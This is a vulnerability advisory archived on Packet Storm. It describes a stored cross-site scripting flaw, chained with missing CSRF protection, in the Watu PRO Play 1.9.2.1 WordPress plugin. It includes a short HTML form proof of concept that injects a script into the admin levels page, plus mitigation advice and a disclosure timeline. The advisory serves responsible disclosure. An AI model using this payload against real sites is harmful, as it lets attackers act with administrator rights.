exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Watu PRO Play 1.9.2.1 Cross Site Scripting

Watu PRO Play 1.9.2.1 Cross Site Scripting
Posted Sep 1, 2015
Authored by Tom Adams

Watu PRO Play version 1.9.2.1 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 162ad6b6b2124d6a4b68d4f59d55c906e0cedefe55ce2e38170f36bb61e258e0

Watu PRO Play 1.9.2.1 Cross Site Scripting

Change Mirror Download
Details
================
Software: Watu PRO Play
Version: 1.9.2.1
Homepage: http://calendarscripts.info/watupro/modules.html#play
Advisory report: https://security.dxw.com/advisories/stored-xss-in-watu-pro-play-allows-unauthenticated-attacker-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can

Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing (e.g. via a phishing attack) is able to execute arbitrary JavaScript. This makes use of a CSRF vulnerability (no nonce protection on the levels form)

Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a JavaScript alert will display on /wp-admin/admin.php?page=watuproplay_levels (in a real attack the form can be made to auto-submit using JavaScript):
<form action=\"http://localhost/wp-admin/admin.php?page=watuproplay_levels&action=add\" method=\"POST\">
<input type=\"text\" name=\"name\" value=\"<script>alert(1)</script>\">
<input type=\"text\" name=\"ok\" value=\"1\">
<input type=\"submit\">
</form>

Mitigations
================
Disable the plugin until a new version is released that fixes this bug

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2015-08-11: Discovered
2015-08-26: Reported to vendor by email
2015-08-26: Requested CVE



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.




Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close